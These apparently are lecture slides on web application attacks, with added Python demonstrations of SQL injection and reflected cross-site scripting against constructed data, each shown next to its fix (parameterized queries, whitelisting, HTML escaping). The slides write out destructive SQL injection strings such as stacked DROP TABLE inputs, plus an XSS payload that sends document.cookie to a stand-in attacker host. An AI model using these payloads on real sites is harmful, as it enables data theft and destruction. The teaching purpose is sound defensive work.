Chapter 13
Web Application Attack Techniques
 SQL injection is used against web forms; for example, suppose a
web page asks a user to enter an employee's last name and then
retrieves and displays information about that employee. If the
user types in the name Smith, the server builds and sends the
following SQL request:
SELECT * from EmployeeTable WHERE LastName='Smith'
 Examples: the attacker types something other than a plain name,
and the text is pasted into the query unchanged
◦ Input Smith' OR 1=1;-- produces
SELECT * from EmployeeTable WHERE LastName='Smith' OR 1=1;--'
which returns every row: OR 1=1 is always true, and -- comments
out the rest of the line, including the programmer's closing quote
◦ Input Smith'; drop table EmployeeTable;-- produces
SELECT * from EmployeeTable WHERE LastName='Smith';
drop table EmployeeTable;--'
which deletes the table if the database driver executes stacked
(semicolon-separated) statements
 One can even look at, modify, or delete other
tables
 Solution: programs on servers must never let user-supplied data
become part of the SQL text. The primary defense is parameterized
queries (prepared statements): the driver sends the value to the
database separately from the statement, so it is compared as data
and cannot be parsed as SQL. As defense in depth, validate input
against a whitelist of acceptable characters (e.g., alphanumerics)
and reject or scrub anything else (e.g., quotation marks,
semicolons), either by deleting the characters or by substituting
an innocuous replacement (e.g., the entity &lt; for the less-than
symbol <, which is the analogous fix when data is written into
HTML rather than into SQL)
 The classic example (the xkcd "Exploits of a Mom" comic): the
application appends the typed first name to a pre-programmed
query that ends in '); and the attacker enters
Robert'); DROP TABLE Students;--
so the database receives
SELECT * from SomeTable WHERE FirstName='Robert'); DROP TABLE
Students;-- ');
The '); in the input closes the string and parenthesis the
programmer opened, DROP TABLE runs as a second statement, and
;-- comments out the pre-programmed '); to avoid a syntax error
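The injection examples above, and the whitelist and parameterized-query defenses described with them, as an added worked example in Python that is not part of the original slides. It uses the standard-library sqlite3 driver with a constructed in-memory EmployeeTable; the table contents, the Salary column and the function names are all assumptions made for the demonstration. The stacked-query case is run through executescript() because sqlite3's execute() refuses more than one statement, which illustrates that whether DROP TABLE payloads work depends on the driver, not only on the application code.

```python
import re
import sqlite3

# Constructed sample data, standing in for the EmployeeTable on the slides.
EMPLOYEES = [("Smith", 50000), ("Jones", 62000), ("Lee", 71000)]


def setup_db():
    """In-memory SQLite database holding the constructed EmployeeTable."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE EmployeeTable (LastName TEXT, Salary INTEGER)")
    conn.executemany("INSERT INTO EmployeeTable VALUES (?, ?)", EMPLOYEES)
    conn.commit()
    return conn


def lookup_vulnerable(conn, last_name):
    """The slide's query built by string concatenation: whatever the user typed
    becomes part of the SQL grammar. Smith' OR 1=1;-- returns every row."""
    sql = "SELECT * FROM EmployeeTable WHERE LastName='" + last_name + "'"
    return conn.execute(sql).fetchall()


def lookup_vulnerable_stacked(conn, last_name):
    """Same concatenation, run through executescript(), which, like many
    database drivers, accepts several ';'-separated statements. Returns the
    names of the tables left in the database so the effect of a DROP is
    visible."""
    sql = "SELECT * FROM EmployeeTable WHERE LastName='" + last_name + "'"
    conn.executescript(sql)
    rows = conn.execute("SELECT name FROM sqlite_master WHERE type='table'")
    return [name for (name,) in rows]


def lookup_parameterized(conn, last_name):
    """The fix: the value travels to the database separately from the
    statement text, so it is compared as data and can never be parsed as
    SQL."""
    return conn.execute(
        "SELECT * FROM EmployeeTable WHERE LastName=?", (last_name,)
    ).fetchall()


# Defense in depth: a whitelist for the last-name field (assumed policy).
# Real surnames such as O'Brien contain an apostrophe, which is one reason
# validation supplements parameterization rather than replacing it.
LAST_NAME_RE = re.compile(r"[A-Za-z][A-Za-z-]{0,63}")


def is_valid_last_name(value):
    return LAST_NAME_RE.fullmatch(value) is not None


def lookup_validated(conn, last_name):
    """Whitelist first, then parameterized query. Rejected input raises
    instead of being silently scrubbed, so the attempt can be logged."""
    if not is_valid_last_name(last_name):
        raise ValueError("last name contains characters outside the whitelist")
    return lookup_parameterized(conn, last_name)


if __name__ == "__main__":
    db = setup_db()
    print("honest input:", lookup_vulnerable(db, "Smith"))
    print("OR 1=1, concatenated:", lookup_vulnerable(db, "Smith' OR 1=1;--"))
    print("OR 1=1, parameterized:", lookup_parameterized(db, "Smith' OR 1=1;--"))
    print("tables after stacked DROP:",
          lookup_vulnerable_stacked(setup_db(),
                                    "Smith'; DROP TABLE EmployeeTable;--"))
```

Run it and the concatenated query returns all three constructed rows for the OR 1=1 payload while the parameterized one returns none, and the stacked payload leaves no tables behind. The trailing -- in each payload is what keeps the programmer's own closing quote from causing a syntax error, exactly as on the slide.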
Three components of a reflected cross-site scripting (XSS) attack:
 An innocent web site (call it Y) that uses browser
cookies and that reflects user input back to the
user's browser (e.g., shopping sites that show
the user a summary of the order before placing
it)
 A victim who has an account on the
aforementioned web site
 An attacker who tricks the victim into clicking on
a link (in an e-mail or on another web site) that
will send them to site Y; the link includes
embedded JavaScript in one of its parameters
 Victim clicks on the malicious link
 Malicious script is sent to web site Y and is
reflected back without being scrubbed (encoded)
 Malicious code executes in the user's browser with
the privileges of site Y's origin
 Malicious code could:
◦ Send all of the user's cookies for the site to the
attacker (cookies flagged HttpOnly are hidden from
script, which is why session cookies should carry it)
◦ Perform actions on site Y as the victim
◦ Attempt to install a backdoor on the victim's computer;
this additionally requires a browser or plug-in
vulnerability, since page script alone is confined to
the browser sandbox
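The reflection step and its fix, as an added example in Python that is not part of the original slides. It models site Y's order-summary page as a one-slot template, renders it once with the raw parameter and once after HTML-encoding it, and then uses the standard-library HTML parser to count the places where a browser would execute script. The template, the attacker host name and the two payloads are constructed for the demonstration.

```python
import html
from html.parser import HTMLParser

# The "order summary" page of site Y from the slides, reduced to one template.
# The {name} slot is filled from a request parameter, i.e. from the link the
# attacker crafted (constructed for this example).
PAGE_TEMPLATE = (
    "<html><body><h1>Order summary</h1>"
    "<p>Ship to: {name}</p>"
    "</body></html>"
)


def render_vulnerable(name):
    """Reflects the parameter into the page as-is: markup in the input becomes
    markup in the page, and any <script> in it runs with site Y's origin."""
    return PAGE_TEMPLATE.format(name=name)


def render_escaped(name):
    """Encodes the HTML metacharacters (& < > " ') before insertion, so the
    browser renders the attacker's text literally instead of parsing it.
    This is the fix for an HTML text context; attribute, URL and JavaScript
    contexts each need their own encoder."""
    return PAGE_TEMPLATE.format(name=html.escape(name, quote=True))


class ScriptContextCounter(HTMLParser):
    """Counts places in a page where script can execute: <script> elements
    and on* event-handler attributes. Checking what the parser sees is more
    honest than grepping the string for the word 'script'."""

    def __init__(self):
        super().__init__()
        self.count = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.count += 1
        for attr_name, _ in attrs:
            if attr_name.startswith("on"):
                self.count += 1


def count_script_contexts(page):
    parser = ScriptContextCounter()
    parser.feed(page)
    parser.close()
    return parser.count


# Constructed payloads of the kind the slides describe. The first ships the
# victim's cookies to an attacker-controlled host (hypothetical name); the
# second shows that a payload need not contain a <script> tag at all.
COOKIE_THEFT = ("<script>new Image().src="
                "'https://attacker.example/c?'+document.cookie</script>")
EVENT_HANDLER = '<img src=x onerror="alert(document.cookie)">'


if __name__ == "__main__":
    for payload in (COOKIE_THEFT, EVENT_HANDLER):
        print("script contexts, unescaped:",
              count_script_contexts(render_vulnerable(payload)))
        print("script contexts, escaped:  ",
              count_script_contexts(render_escaped(payload)))
        print(render_escaped(payload))
```

With the raw render each payload yields one executable context; after html.escape() there are none and the page simply displays the attacker's text. Encoding on output is the fix the slide calls "scrubbing"; it has to be applied at every reflection point, and marking the session cookie HttpOnly limits the damage if one is missed.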
 The Open Web Application Security Project (OWASP; renamed the
Open Worldwide Application Security Project in 2023) periodically
updates a top ten list of web application vulnerabilities
 Items are chosen based on prevalence, exploitability,
detectability, and impact estimates
 According to the list's introductory page, the
"data spans over 500,000 vulnerabilities across
hundreds of organizations and thousands of
applications."
 As the introductory page warns, don't stop at ten: the list is a
starting point, not a complete checklist
 Free
◦ Nikto (open-source web server scanner maintained by CIRT.net; not
an OWASP project)
◦ Paros proxy (intercepting proxy, no longer maintained; OWASP ZAP
began as a fork of it)
 Commercial
◦ Burp Suite Pro (a free Community edition also exists)
 Practice target
◦ OWASP WebGoat, a deliberately insecure web application for
trying these attacks legally

Editor's Notes

  1. The Robert'); DROP TABLE Students;-- example ("Exploits of a Mom") is taken from http://imgs.xkcd.com/comics/exploits_of_a_mom.png